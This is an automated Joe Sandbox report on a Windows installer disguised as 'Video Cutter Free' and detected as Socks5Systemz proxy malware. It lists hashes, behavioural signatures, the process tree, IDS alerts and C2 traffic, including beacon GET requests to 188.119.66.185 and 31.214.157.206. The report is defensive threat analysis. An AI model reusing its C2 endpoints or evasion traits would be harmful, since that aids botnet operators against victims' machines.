Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
imMQqf6YWk.exe

Overview

General Information

Sample name:imMQqf6YWk.exe
renamed because original name is a hash value
Original sample name:c9019cfc066b4cf4439ab3fa00ae3ac9.exe
Analysis ID:1572393
MD5:c9019cfc066b4cf4439ab3fa00ae3ac9
SHA1:0ae7c04b0cbcc96bf8388062135bc0484981c3c2
SHA256:798418d2b435a7feab725f614e2b77b3e311c9b859dec456edccc42af6982426
Tags:exeuser-abuse_ch
Infos:

Detection

Socks5Systemz
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • imMQqf6YWk.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\imMQqf6YWk.exe" MD5: C9019CFC066B4CF4439AB3FA00AE3AC9)
    • imMQqf6YWk.tmp (PID: 5252 cmdline: "C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp" /SL5="$2042A,3667024,54272,C:\Users\user\Desktop\imMQqf6YWk.exe" MD5: A0EB775B14D55062C7EB9F9226916FE8)
      • net.exe (PID: 1440 cmdline: "C:\Windows\system32\net.exe" pause video_cutter_free_12102 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 2520 cmdline: C:\Windows\system32\net1 pause video_cutter_free_12102 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • videocutterfree.exe (PID: 6460 cmdline: "C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe" -i MD5: F00EE01B4436F8DD28084F015B123ECC)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-E132I.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
          00000005.00000000.2025991381.0000000000401000.00000020.00000001.01000000.00000009.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            00000005.00000002.3874746180.0000000002DA1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
              00000001.00000002.3874521806.0000000005A20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Process Memory Space: videocutterfree.exe PID: 6460JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  SourceRuleDescriptionAuthorStrings
                  5.0.videocutterfree.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-10T14:36:27.223217+010020287653Unknown Traffic192.168.2.549933188.119.66.185443TCP
                    2024-12-10T14:36:32.934097+010020287653Unknown Traffic192.168.2.549945188.119.66.185443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-10T14:36:27.910797+010028032742Potentially Bad Traffic192.168.2.549933188.119.66.185443TCP
                    2024-12-10T14:36:33.620187+010028032742Potentially Bad Traffic192.168.2.549945188.119.66.185443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: imMQqf6YWk.exeReversingLabs: Detection: 23%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeJoe Sandbox ML: detected
                    Source: C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0045CFD8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045CFD8
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0045D08C ArcFourCrypt,1_2_0045D08C
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0045D0A4 ArcFourCrypt,1_2_0045D0A4
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeUnpacked PE file: 5.2.videocutterfree.exe.400000.0.unpack
                    Source: imMQqf6YWk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Video Cutter Free_is1Jump to behavior
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.5:49933 version: TLS 1.2
                    Source: Binary string: msvcp71.pdbx# source: is-LDIKA.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-2IP8E.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-LDIKA.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-IBF1C.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-2IP8E.tmp.1.dr
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00474DFC FindFirstFileA,FindNextFileA,FindClose,1_2_00474DFC
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004625C4 FindFirstFileA,FindNextFileA,FindClose,1_2_004625C4
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00463B50 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463B50
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00497C14 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00497C14
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00463FCC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463FCC
                    Source: global trafficTCP traffic: 192.168.2.5:49939 -> 31.214.157.206:2024
                    Source: Joe Sandbox ViewIP Address: 31.214.157.206 31.214.157.206
                    Source: Joe Sandbox ViewIP Address: 188.119.66.185 188.119.66.185
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49945 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49933 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49945 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49933 -> 188.119.66.185:443
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021ddd3b271ed4328f HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4ce71bc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad0388fd3d5965e HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_00992B95 WSASetLastError,WSARecv,WSASetLastError,select,5_2_00992B95
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021ddd3b271ed4328f HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4ce71bc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad0388fd3d5965e HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: imMQqf6YWk.tmp, imMQqf6YWk.tmp, 00000001.00000000.2013110309.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-LRS1N.tmp.1.dr, imMQqf6YWk.tmp.0.drString found in binary or memory: http://www.innosetup.com/
                    Source: imMQqf6YWk.exe, 00000000.00000003.2012312615.0000000002158000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2012131202.0000000002380000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, imMQqf6YWk.tmp, 00000001.00000000.2013110309.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-LRS1N.tmp.1.dr, imMQqf6YWk.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
                    Source: imMQqf6YWk.exe, 00000000.00000003.2012312615.0000000002158000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2012131202.0000000002380000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000000.2013110309.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-LRS1N.tmp.1.dr, imMQqf6YWk.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU
                    Source: videocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, videocutterfree.exe, 00000005.00000002.3874926537.000000000358B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/
                    Source: videocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/8
                    Source: videocutterfree.exe, 00000005.00000002.3874287343.0000000000C08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b325
                    Source: videocutterfree.exe, 00000005.00000002.3874926537.000000000358B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4
                    Source: videocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/en-GB
                    Source: imMQqf6YWk.exe, 00000000.00000002.3874000805.0000000002151000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2011773117.0000000002151000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2011705088.0000000002380000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000002.3874072222.0000000000832000.00000004.00000020.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000003.2013945725.0000000003230000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000002.3874349520.0000000002358000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000003.2014010509.0000000002358000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.5:49933 version: TLS 1.2
                    Source: is-IBF1C.tmp.1.drBinary or memory string: DirectDrawCreateExmemstr_558705a6-5
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0042F520 NtdllDefWindowProc_A,1_2_0042F520
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00423B84 NtdllDefWindowProc_A,1_2_00423B84
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004125D8 NtdllDefWindowProc_A,1_2_004125D8
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004785E0 NtdllDefWindowProc_A,1_2_004785E0
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004573E0 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_004573E0
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E934
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exeCode function: 0_2_0040840C0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004804DB1_2_004804DB
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0047051C1_2_0047051C
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004672181_2_00467218
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004352C81_2_004352C8
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0043DD501_2_0043DD50
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0043035C1_2_0043035C
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004444C81_2_004444C8
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004345C41_2_004345C4
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004866B41_2_004866B4
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00444A701_2_00444A70
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_00430EE81_2_00430EE8
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0045EF381_2_0045EF38
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0045AFC41_2_0045AFC4
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004451681_2_00445168
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004692781_2_00469278
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004455741_2_00445574
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004876141_2_00487614
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_0048D9F01_2_0048D9F0
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: 1_2_004519BC1_2_004519BC
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_004010515_2_00401051
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_00401C265_2_00401C26
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609660FA5_2_609660FA
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6092114F5_2_6092114F
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6091F2C95_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6096923E5_2_6096923E
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6093323D5_2_6093323D
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6095C3145_2_6095C314
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609503125_2_60950312
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6094D33B5_2_6094D33B
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6093B3685_2_6093B368
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6096748C5_2_6096748C
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6093F42E5_2_6093F42E
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609544705_2_60954470
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609615FA5_2_609615FA
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6096A5EE5_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6096D6A45_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609606A85_2_609606A8
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609326545_2_60932654
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609556655_2_60955665
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6094B7DB5_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6092F74D5_2_6092F74D
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609648075_2_60964807
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6094E9BC5_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609379295_2_60937929
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6093FAD65_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6096DAE85_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6094DA3A5_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60936B275_2_60936B27
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60954CF65_2_60954CF6
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60950C6B5_2_60950C6B
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60966DF15_2_60966DF1
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60963D355_2_60963D35
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60909E9C5_2_60909E9C
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60951E865_2_60951E86
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60912E0B5_2_60912E0B
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60954FF85_2_60954FF8
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_0099605A5_2_0099605A
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009A72B25_2_009A72B2
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009A9AAA5_2_009A9AAA
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009B42105_2_009B4210
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009ACB095_2_009ACB09
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009B3C995_2_009B3C99
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009A8CF45_2_009A8CF4
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009AD4155_2_009AD415
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009B1C245_2_009B1C24
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_0099DE295_2_0099DE29
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009ACFFD5_2_009ACFFD
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_009E15E65_2_009E15E6
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\DVCMediaPlugin\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: String function: 009A7950 appears 37 times
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: String function: 009B41A0 appears 139 times
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: String function: 00408C0C appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: String function: 00406AC4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: String function: 0040595C appears 117 times
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: String function: 00403400 appears 60 times
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: String function: 00445DD4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: String function: 004344DC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: String function: 004078F4 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: String function: 00457D6C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: String function: 00403494 appears 82 times
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmpCode function: String function: 00403684 appears 224 times
